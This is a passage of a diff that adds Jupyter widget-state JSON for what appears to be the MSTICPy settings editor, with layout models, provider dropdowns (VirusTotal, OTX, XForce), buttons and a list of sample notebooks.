+       "layout": "IPY_MODEL_f8301f17c83744e285131a932f17ac93"
+      }
+     },
+     "13869d6728da436c8a0427297c562633": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "138d7cd9b7f44aa7bdffa09d716075fb": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "98%"
+      }
+     },
+     "14c9008e8f47467d8d14cfefc516cfd9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_da2c6f312f024674a6a4c5cefa7fa327",
+        "IPY_MODEL_38829782356341fd9995d90c978a0283"
+       ],
+       "layout": "IPY_MODEL_e1c3854188344e2cbe4e03da02b0c737"
+      }
+     },
+     "14d6dd46a9ee49a6871b43708ed9e33f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "154998f70684455ab9e11390a28f76a9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "70px"
+      }
+     },
+     "161eadfc4a3c41479a5af495b43b7fc2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "167bc44f4cf749fa84d59af05f7cf21c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "16b8d8f0f6344b5c90320016e5bef273": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "16dbbff9539249999cfc12f92a57010f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "70px"
+      }
+     },
+     "16ea839dfe5d4012be49b1904e01da03": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "17036b63551449058a8dd0e70c48bbe9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "175a5b22d56d4712a111bc58fd46ef62": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "177881e32cac4853a1ab05be79981e72": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "177da9d6558b4f048e2a071d82d03631": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_abe77675129540e396fa8c3fdfe94369",
+       "style": "IPY_MODEL_7c0b2ec73e5b4511bf23ce3fdbf0661c",
+       "value": "Operations"
+      }
+     },
+     "17dfa63ae43940568587f69f37ab8537": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Current file",
+       "layout": "IPY_MODEL_2b8456d0ff9245619e0c5c41e337264e",
+       "style": "IPY_MODEL_4bd3cdf4619f4e559b1a2e599956abf3",
+       "value": "e:\\src\\microsoft\\msticpyconfig.yaml"
+      }
+     },
+     "182aa09a4527437099f82b999837b005": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_1058a90b3442420ebafe4016311de687",
+       "style": "IPY_MODEL_e8c4c105db684733a78352cd4aa810af",
+       "value": "AuthKey"
+      }
+     },
+     "187dce0f9c154631846ff986cf78a12d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "18a3ea5f250e443d88557adcc9a21abf": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_c87c175f76ec49d1b7443a8224c2f24a",
+        "IPY_MODEL_71c6580cd52441f79d6d6aa0edd1689b",
+        "IPY_MODEL_7947c79c054a47d2a3ae91ad52385400",
+        "IPY_MODEL_dddbd4cc3ac14899a9a8eead61abc3f8"
+       ],
+       "layout": "IPY_MODEL_b43048186b9e4f38a4bfd837408aa9f7"
+      }
+     },
+     "1a86555b95c54880bf421fbcd3994b8b": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "1a97678169c249ed94b2fb9cf3d345f8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "1ab19da8ba0a481e89f8a857171b5ecd": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "39%"
+      }
+     },
+     "1ab85202d43e4c54b7ee23175398ae44": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "1b198209569e4eafb52a5393ec035a5e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_46170d4f86244b4190a759daa1231f10",
+        "IPY_MODEL_0a153ce133234e9a858627f253cd2a4e"
+       ],
+       "layout": "IPY_MODEL_592a0a7fb23041f2a15b180546beb756"
+      }
+     },
+     "1b6b561c2e8b4d1597e4f2f731d6c4d3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "70px"
+      }
+     },
+     "1b8bf40a72f54365b6d8d3a2a499b0d2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_dec4bbb7f67646daa1249b5a38a0ca75",
+        "IPY_MODEL_14c9008e8f47467d8d14cfefc516cfd9",
+        "IPY_MODEL_ffe51e5ff70f4209800dfd26f7aacd30",
+        "IPY_MODEL_b90a583dd72d4fa2979eea84ba588ba5"
+       ],
+       "layout": "IPY_MODEL_5fab1be1fcf84e809f8f41624ad10612"
+      }
+     },
+     "1b95eacfdf7e4beabc752b058a2ee210": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "TILookup",
+        "GeoIpLookup",
+        "Notebooklets",
+        "Pivot",
+        "AzureData",
+        "AzureSentinelAPI"
+       ],
+       "description": "Add item",
+       "index": null,
+       "layout": "IPY_MODEL_9caa44f895cc47cebeef08172be906b2",
+       "style": "IPY_MODEL_2c5350ad89184c2e8996c15c46d13df7"
+      }
+     },
+     "1ba30e65beee44698a1eb5821e5ecd63": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_d7844dbb5e304f068e8390c8b9832539",
+        "IPY_MODEL_9a9c3def930f47ed86ae7a146c604c2d"
+       ],
+       "layout": "IPY_MODEL_52eddaf23b26471ebe2e1a1708f68d1e"
+      }
+     },
+     "1c9e7eaa28a44828bed8e0f318b7d95f": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "visibility": "hidden"
+      }
+     },
+     "1d00425e93a7419aa677477fdb46dde4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_fc49d7adac414aa8b261504449a7b5b6",
+        "IPY_MODEL_78669e5c5d3249b9a5fc6a3acf613566",
+        "IPY_MODEL_4397f924dea5447db13eb2fec419aa50",
+        "IPY_MODEL_75f713decd474fbfad61635108533541"
+       ],
+       "layout": "IPY_MODEL_6b83b8bed3d443098b7842c46d883491"
+      }
+     },
+     "1e7d59e4b3a34e3db96a8c7999a499e8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "95%"
+      }
+     },
+     "1e8ca8d8bab14d669bb930f230a97d37": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "1eada7df6d564c40a8f78295b893c45e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "1f10afb27a14428cbddd6ae9608c2cf1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_3e3702c8b23043038794b24215309935",
+       "style": "IPY_MODEL_0ee322cc4e0041dea7614fb3f4f3eac9",
+       "value": "Operations"
+      }
+     },
+     "1f2f704c99c14428a081a7d241746a6f": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "70%"
+      }
+     },
+     "1f39abd684a54ef9ac5d923248b498fe": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "100px"
+      }
+     },
+     "1f47cc55f25043a69a226733ef757755": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "70px"
+      }
+     },
+     "1f6ddb7a2a0b488e897cd7044bdb5f73": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "2039c4a4a3d544079f7eae4fb87b5f0b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "20558f5a47434bde9e71751de9ab8ca6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_182aa09a4527437099f82b999837b005",
+        "IPY_MODEL_ada9c7d5022645a2b3358762d9da817a",
+        "IPY_MODEL_75f713decd474fbfad61635108533541"
+       ],
+       "layout": "IPY_MODEL_a1fcd22769e7460cbc8b57ea13f713de"
+      }
+     },
+     "206c718d525c45ee9b2d7e52f492c85c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "20c8382e46bb405d8293dc735e51ddaf": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "212641af08d2481f9ca8ab839126fb88": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "100%"
+      }
+     },
+     "22015fc451994232ad4faa1a60933927": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "2227d621e8484dbc8735b5ee41e636ab": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "232407438b8f47b78979fdfa607b7225": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "233c9ef671354133a499f4c859d351c1": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "23b81a4820224c27a15d0b85cceaaa01": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_24e9d01bd7884bae8afac365d80b4d23",
+       "style": "IPY_MODEL_2f3a54e18acc4d55870bdbc0cffcdba5",
+       "value": "User Defaults - Auto-loaded query providers"
+      }
+     },
+     "23faa484d88a460581c9e216f2d471fb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "24098cf2accc46b18f4f57b4f7cd5c2e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_ca6d9ef594db4917b223d93e54e9aed7",
+        "IPY_MODEL_0d9880fa9fea44428db6274aa690d1f1",
+        "IPY_MODEL_0a153ce133234e9a858627f253cd2a4e"
+       ],
+       "layout": "IPY_MODEL_4c097fcbd50a4a388c70bc5855a23ddc"
+      }
+     },
+     "24dde21eac3f4f33b28cfd1362b7aa3e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "150px",
+       "width": "300px"
+      }
+     },
+     "24e9d01bd7884bae8afac365d80b4d23": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "2562193d1b3d46949b5fa0a29a3f1bef": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "2575e5825f654cc98849dc18d3da66e3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "259408ebc289437f9eaccf6cab42636e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Set as default",
+       "layout": "IPY_MODEL_737390d7f11e44628699d38bc4941b87",
+       "style": "IPY_MODEL_acfa430b45944781905f52df22d98599"
+      }
+     },
+     "25bd3398e1ea4104aa33cc2de08e2a23": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "25dc7e2621034678b93ed818aa22ac4b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "261225eae1f242729a5de8700cba9bb3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "26bb903822cb4a1e9dedf47af70ff683": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "ResourceGroup",
+       "layout": "IPY_MODEL_1f2f704c99c14428a081a7d241746a6f",
+       "style": "IPY_MODEL_f342a3f34e144f42bdb50c6b40d4eea8"
+      }
+     },
+     "278253aa0ed24da7bb318bb1838aecf9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_3ea8c40fef054f1da41e3bd4613334e2",
+       "style": "IPY_MODEL_be78282b40d241a1a67caccad2c6457c",
+       "value": "Azure Sentinel workspace settings"
+      }
+     },
+     "27e822a66fc8456e8a9fe24b0ce62ac0": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "28dca0927c614547b5b4d916373cfeb0": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "290deed86af04757ac17a4ee59bf99b1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Close",
+       "layout": "IPY_MODEL_2c8a5a8367da4ecbbc8c17c36a443453",
+       "style": "IPY_MODEL_a50019f9421343d297c119aec72b6e78"
+      }
+     },
+     "29a27659a9ad4cfcab02b9e9654f252f": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "29e89c0a53d04311a8a38523407b220e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextareaModel",
+      "state": {
+       "layout": "IPY_MODEL_acfbd0b65c154815aa1298359b585f00",
+       "style": "IPY_MODEL_c99b28c8227d496e91e5d04fa3bcbec7"
+      }
+     },
+     "2a16e3a3c48c41e999c742e2a9868d95": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "2a1c811b8bec45bcab1e2e46a9e848ac": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "2a8595894d4d4238b870627c2b05f798": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_a18d67cd1e774e70b27024f8ad7804a5",
+        "IPY_MODEL_3cae9c1da47e4818aa5c64d445f6c11d",
+        "IPY_MODEL_8f3d40a2925744548e21a78108c649b1"
+       ],
+       "layout": "IPY_MODEL_4575b35b46ca4bcdad5f20b4b8187ffc"
+      }
+     },
+     "2aa8b2f3bf764ce08f0534066d54a2e4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_bd31f21d00d24f0792fdc92f6006cb97",
+        "IPY_MODEL_38e46ce27b2145a6bf0fc2f37e0b244f"
+       ],
+       "layout": "IPY_MODEL_4e06a170f46d449ba69a209c80724ec3"
+      }
+     },
+     "2b087e1d24ed43de8c70e2a5274b21ec": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_6748e6bcf99841d4a56800f49759bc70",
+        "IPY_MODEL_80b28adc931145658bcb038a13976f93"
+       ],
+       "layout": "IPY_MODEL_431f387beeb34628a27107bd1b649505"
+      }
+     },
+     "2b0b36f8b43e4da99760465f472ccfe0": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Validate Settings",
+       "layout": "IPY_MODEL_fe7906d23c6047e8bad2542ae8dbe0f0",
+       "style": "IPY_MODEL_b1a30702491041c99764946d0af98256"
+      }
+     },
+     "2b8456d0ff9245619e0c5c41e337264e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "2be6942018f04602b788fe74ef9c0be9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "2c053ef2d7a64211a81e4d7f4963e125": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "OTX",
+        "VirusTotal",
+        "XForce",
+        "AzureSentinel",
+        "OpenPageRank",
+        "TorExitNodes"
+       ],
+       "description": "Add prov",
+       "index": 0,
+       "layout": "IPY_MODEL_b0e64443606440cfbea552abe06f8366",
+       "style": "IPY_MODEL_48d0f3eae20847e1bf950bdb53fe78b0"
+      }
+     },
+     "2c5350ad89184c2e8996c15c46d13df7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "70px"
+      }
+     },
+     "2c8a5a8367da4ecbbc8c17c36a443453": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "2ce9b30e25124b11ae69164a3eeb6f5a": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "2d3b09491cdf4bc09a3e6846b26a8f9b": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "2d62568d9de84032bfe75fb9c57c1616": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "CheckboxModel",
+      "state": {
+       "description": "UseKeyring",
+       "disabled": false,
+       "layout": "IPY_MODEL_307293a98db44c97848b363bc6f39f99",
+       "style": "IPY_MODEL_6f07b67292ee4223b96a75b6e95a05e8",
+       "value": true
+      }
+     },
+     "2decd307abe642d58e42a1c88add7379": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "2e7bbe9ec04a44ec95c886a37abbad54": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "2e80a44a83fa433abaaf608cca409118": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "2f109b2ef4fa459686b858b23a0d6963": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "OTX",
+        "OpenPageRank",
+        "TorExitNodes",
+        "VirusTotal",
+        "XForce"
+       ],
+       "description": "Providers",
+       "index": 0,
+       "layout": "IPY_MODEL_535aa7be330448fca1e52a4a09538928",
+       "style": "IPY_MODEL_1b6b561c2e8b4d1597e4f2f731d6c4d3"
+      }
+     },
+     "2f3a54e18acc4d55870bdbc0cffcdba5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "2fbe103305224ee88fa9a4dc47b22ece": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "95%"
+      }
+     },
+     "3064486c0abc4c6b9d1e74076ac529cb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HTMLModel",
+      "state": {
+       "layout": "IPY_MODEL_f3f43f2784664a2ca5759bc9641aac0a",
+       "style": "IPY_MODEL_206c718d525c45ee9b2d7e52f492c85c",
+       "value": "<h3>MSTICPy settings</h3>"
+      }
+     },
+     "307293a98db44c97848b363bc6f39f99": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "80%"
+      }
+     },
+     "30751b67b634429593b9a2c17e41f331": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "description": "Results",
+       "index": null,
+       "layout": "IPY_MODEL_0c2fc443e3384cdaaec719922bb0f8e1",
+       "style": "IPY_MODEL_fe6ed8ffe27c424cb09e275e98f7af3e"
+      }
+     },
+     "31102513d04d46bfb4f8befd49dac4db": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "40%"
+      }
+     },
+     "31b6c1c750fe4f68bc08ae82f8c55c43": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "33066883d4cf4568b9a94f08b4a4d404": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_cacc86330c2f49c890e594fa673eb320",
+        "IPY_MODEL_e447a25371dc4c049e024dae06d983b9"
+       ],
+       "layout": "IPY_MODEL_27e822a66fc8456e8a9fe24b0ce62ac0"
+      }
+     },
+     "33619eb5814343c894c1ed2b209b8cde": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_abc7cd3abbed417893ef254d169dd750",
+        "IPY_MODEL_f65ca0d67bea49cc861564ae02c65c6f"
+       ],
+       "layout": "IPY_MODEL_6c8e47ffb370450289fdb260bfc639a6"
+      }
+     },
+     "3440f923112d4a73b5c41c3f3283c803": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_ae0e28b48b1f419a9c9d1099b9554277",
+        "IPY_MODEL_9d2246271f2c402ababa11ccecf29504",
+        "IPY_MODEL_fe2b11d4cfc6484197363ab86e5c24f0",
+        "IPY_MODEL_0751b6e7a386403383655171128c00d5"
+       ],
+       "layout": "IPY_MODEL_80b95eee94a1435285c48a43cea7ec10"
+      }
+     },
+     "3601702b16814daeb2a400400dd220f3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "75%"
+      }
+     },
+     "36241717178c4e7abf2562db23da4f5d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "99%"
+      }
+     },
+     "369c91149ff749598a1b4f5c36e2c60b": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "100px"
+      }
+     },
+     "36bb561ad3b643f68b4912a64143adf1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Save",
+       "layout": "IPY_MODEL_a401941d9f3d4e2ca6c3460843d09506",
+       "style": "IPY_MODEL_4c7991a6833c46288a4ae5d2f3be6c0d"
+      }
+     },
+     "376254cbac7a4c4ab86f4c804e557e3f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_58ede001092d4da3b99c975b3e919572",
+        "IPY_MODEL_d9bd349c501e46e4ae1576492312185c"
+       ],
+       "layout": "IPY_MODEL_e34b57b30a8a4f6c9992f52c1dbbd6ef"
+      }
+     },
+     "3795ac9f3af34c94a6a68f48cf47076d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Select File",
+       "layout": "IPY_MODEL_4ed07a4cc89d48baadedc2b989e8eb0b",
+       "style": "IPY_MODEL_6b25495742264e58b7a1f38b967efd90"
+      }
+     },
+     "380f2f40adef4e2dadff1e271a42d42e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "38829782356341fd9995d90c978a0283": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "AnomalousSequence.ipynb",
+        "AzureBlobStorage.ipynb",
+        "AzureSentinelAPIs.ipynb",
+        "Base64Unpack.ipynb",
+        "DataObfuscation.ipynb",
+        "DataUploader.ipynb",
+        "Data_Queries.ipynb",
+        "EventClustering.ipynb",
+        "EventTimeline.ipynb",
+        "FoliumMap.ipynb",
+        "GeoIPLookups.ipynb",
+        "IoCExtract.ipynb",
+        "MDATPQuery.ipynb",
+        "MordorData.ipynb",
+        "MPSettingsEditor.ipynb",
+        "msticpyconfig.yaml",
+        "MSTICpy_Blackhat_Demo_2020.ipynb",
+        "NotebookWidgets.ipynb",
+        "PivotFunctions-Introduction.ipynb",
+        "PivotFunctions.ipynb",
+        "ProcessTree.ipynb",
+        "Splunk-DataConnector.ipynb",
+        "SqlToKql.ipynb",
+        "TimeSeriesAnomaliesVisualization.ipynb",
+        "TIProviders.ipynb",
+        "VirusTotalLookup.ipynb",
+        "VTLookupV3.ipynb"
+       ],
+       "description": "Files",
+       "index": 0,
+       "layout": "IPY_MODEL_be40b457654848108782eda0a6277486",
